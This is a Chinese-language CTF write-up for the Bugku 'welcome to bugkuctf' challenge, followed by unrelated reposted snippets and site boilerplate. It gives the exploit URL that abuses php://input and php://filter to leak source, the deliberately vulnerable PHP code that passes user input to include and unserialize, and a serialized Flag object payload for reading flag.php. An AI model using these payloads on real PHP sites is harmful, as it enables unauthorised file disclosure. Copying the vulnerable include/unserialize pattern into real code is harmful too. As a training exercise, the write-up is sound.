welcome to bugkuctf(详解)——Bugku
刚刚做了bugku的题目现在整理一下
写出解题思路希望能够帮助到那些需要帮助的人
所有的wp都是以一题一篇的形式写出
主要是为了能够让读者更好的阅读以及查找
希望你们不要责怪共勉
解题思路这一题我一开始的时候使用的是hackbar并没有任何反应所以最后选择使用burp
那么解题思路就以burp来写了
首先使用burp进行抓包处理就好
可以看到源代码我大概的说一下其中的含义
1.三个传参
2.$user存在且不为空
3.读取$user文件内容为welcome to the bugkuctf
4.$file要求为hint.php将其导入
其实比较熟悉就知道两个点可以利用了php://input与php://filter
这里需要使用的是php://input
当传进去的参数作为文件名变量去打开文件时可以将参数php://传进
同时post方式传进去值作为文件内容供php代码执行时当做文件内容读取
我们再利用php://filter 读取hint.php的内容就好了
使用的load url:
http://120.24.86.145:8006/test1/index.php?txt=php://input&file=php://filter/read=convert.base64-encode/resource=hint.php&password=
属于base64编码进行解密就会得到
<?php class Flag{//flag.php public $file; public function __tostring(){ if(isset($this->file)){ echo file_get_contents($this->file); echo "<br>"; return ("good"); } } } ?> 同理把hint.php改为index.php就会得到
又是一段base64编码的同理就会得到
<?php $txt = $_GET["txt"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($txt)&&(file_get_contents($txt,'r')==="welcome to the bugkuctf")){ echo "hello friend!<br>"; if(preg_match("/flag/",$file)){ echo "给你 flag吧¦"; exit(); }else{ include($file); $password = unserialize($password); echo $password; } }else{ echo "you are not the number of bugku ! "; } ?> <!-- $user = $_GET["txt"]; $file = $_GET["file"]; $pass = $_GET["password"]; if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){ echo "hello admin!<br>"; include($file); //hint.php }else{ echo "you are not admin ! "; } -->
从上面获取的源码可得到如下信息
1.提示hint.php中提示flag.php,从index.php可以看到对关键词flag进行了屏蔽
2.hint.php中定义了一个类Flag很有意思的是中间有个 __tostring 方法这个方法可以理解为将这个类作为字符串执行时会自动执行的一个函数
3. __tostring 方法执行时将变量$file作为文件名输出文件内容结合提示flag.php猜测屏蔽的flag.php文件在此打开
4.在index.php源码中看到了$password的作用
这里走进了一个坑一直在想办法绕过flag关键词的屏蔽但是限制于php://fliter的格式一直不得其解
正解应该是利用$password
之前说过Flag方法当做字符串执行时会自动执行 __tostring 方法注意到echo函数只能输出一个或多个字符串所以只要$password为Flag类型数据且其中string类型的变量$file为flag.php即可
理解到这里就懂了为啥多一个很奇怪的unserialize函数其作用即为让你用字符串方式传递一个类
这里参考的博文是https://blog.csdn.net/wy_97/article/details/77771026
执行得到O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
就会得到
最后的答案flag{php_is_the_best_language}
关注公众号 低调大师中文资讯倾力打造互联网数据资讯、行业资源、电子商务、移动互联网、网络营销平台。
持续更新报道IT业界、互联网、市场资讯、驱动更新,是最及时权威的产业资讯及硬件资讯报道平台。
转载内容版权归作者及来源网站所有,本站原创内容转载请注明来源。
- 上一篇
Android--手机root获取与判断应用是否获取
版权声明:本文为博主原创文章,转载请标明出处。 https://blog.csdn.net/chaoyu168/article/details/81075850 import android.util.Log; import java.io.DataOutputStream; import java.io.File; /** * 判断手机是否ROOT */ public class isRoot{ public static int root() { int root = 0; try { if ((!new File("/system/bin/su").exists()) && (!new File("/system/xbin/su").exists())) { root = 0; } else { root = 1; } } catch (Exception e) { } return root; } /** * * 判断应用是否有root权限 */ public static synchronized boolean getRootAhth() { Process...
- 下一篇
新手如何在项目中使用区块链?
我是一个区块链Blockchain新手,我想在我们新的金融项目中使用区块链,其中预测功能将在不同系统之间共享。 互联网上有很多说法,但是我们可以从哪里开始实施? 这取决于你的Blockchain区块链想要达到的目标。此外,还取决于你想要一个公有链还是私有链。 如果你想启动一个私有链,即控制区块链,数据不开放,我建议你开始从Hyperledger Fabric超级账本开始。 另一方面,如果你想启动一个公有链,也就是说每个人都会进入区块链当它开放以后,那我建议你从ethereum以太坊开始。 如果你提供更多关于你的具体想法,可能会容易得到帮助。这个问题有些太宽泛了。 原文:http://cw.hubwiz.com/card/c/ethereum-FAQ/1/1/6/ 推荐一些可以高效学习的教程: python以太坊,主要是针对python围绕web3.py进行区块链以太坊应用开发的讲解。 web3j,主要是针对java和android程序员围绕web3j库进行区块链以太坊开发的讲解。 php以太坊,主要是介绍使用php进行智能合约开发交互,进行账号创建、交易、转账、代币开发以及过滤器和事件...
相关文章
文章评论
共有0条评论来说两句吧...
微信收款码
支付宝收款码